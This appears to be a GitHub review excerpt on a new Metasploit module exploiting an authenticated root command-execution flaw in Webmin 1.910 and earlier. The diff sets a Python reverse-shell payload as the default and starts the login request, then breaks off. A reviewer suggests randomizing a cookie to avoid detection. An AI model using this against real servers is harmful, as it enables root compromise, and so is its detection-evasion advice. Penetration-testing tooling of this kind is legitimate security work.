modules/exploits/linux/http/webmin_packageup_rce.rb

```diff
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
+      'Description'    => %q(
+        This module exploits an arbitrary command execution vulnerability in Webmin
+        1.910 and lower versions. Any user authorized to the "Package Updates"
+        module can execute arbitrary commands with root privileges.
+
+      ),
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-'],
+          ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'RPORT' => 10000,
+          'SSL'   => false,
+          'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.910', {}]],
+      'DisclosureDate' => 'May 16 2019',
+      'DefaultTarget'  => 0)
+    )
+    register_options [
+        OptString.new('USERNAME',  [true, 'Webmin Username']),
+        OptString.new('PASSWORD',  [true, 'Webmin Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
+    ]
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+
+  def login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+      'cookie' => 'testing=1',
```

Comment:
Is this a true default (given by the system) or just arbitrary for this module?  If its arbitrary, I would randomize it to prevent easy detection

Reply:
I'm sorry I missed it. I removed these values. "sid" will suffice. Thanks